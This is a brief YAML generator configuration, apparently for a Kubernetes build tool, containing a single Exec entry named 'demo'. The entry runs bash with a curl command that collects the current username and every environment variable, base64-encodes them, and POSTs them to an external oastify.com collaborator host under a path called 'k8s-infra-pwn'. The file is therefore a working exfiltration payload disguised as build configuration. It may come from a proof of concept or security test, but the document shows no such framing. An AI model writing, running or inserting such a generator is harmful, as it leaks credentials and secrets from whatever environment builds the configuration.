generators:
  - |-
    kind: Exec
    metadata:
      name: demo
    spec:
      bin: /bin/bash
      args: 
        - -c
        - curl -X POST -d "user=$(whoami)&secrets=$(env | base64)" https://xmnn7cudoxtqf1rc4lg12zg3eukl8cw1.oastify.com/k8s-infra-pwn
